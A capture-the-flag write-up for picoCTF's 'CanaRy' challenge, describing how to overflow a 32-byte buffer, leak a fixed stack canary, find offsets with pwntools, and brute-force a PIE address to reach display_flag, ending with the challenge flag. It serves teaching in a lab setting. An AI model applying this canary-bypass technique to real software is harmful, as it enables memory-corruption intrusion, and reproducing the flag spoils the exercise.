CanaRy
Last updated
Was this helpful?
Last updated
Was this helpful?
This time we added a canary to detect buffer overflows. Can you still find a way to retreive the flag from this program located in /problems/canary_2_dffbf795b4788666d54a993a5e41d145. Source.
BUF_SIZE
is 32 bytes so offset by 'a'*32
since canary will be next in stack
Leak the canary by running the file on the shell server
Paste Canary into on line 13
Offset after canary determined using cyclic(24)
and cyclic_find()
with python2 -c "from pwn import *; print 'a'*32 + 'ex;Y' + cyclic(100)" | ./vuln
locally to get offset as 'a'*16
.
Last 1.5 bytes of display_flag
function determined with readelf -s vuln
First byte found with gdb by placing a breakpoint at vuln
and running which got Breakpoint 1, 0x56622a14 in main ()
and more importantly the first byte 0x56
Loops in hex are used to bruteforce every possible value for the remaining 1.5 bytes and p32
from pwntools
is used to convert to little endian
Run on shell server by pasting bruteforce_pie
function (after running from pwn import *
) into python terminal and then running print bruteforce_pie()
Flag will appear in a few minutes
If the flag doesn't appear after running the program then run it again and it will work (the program doesn't check addresses with zeros in them)
picoCTF{cAnAr135_mU5t_b3_r4nd0m!_1df5fde9}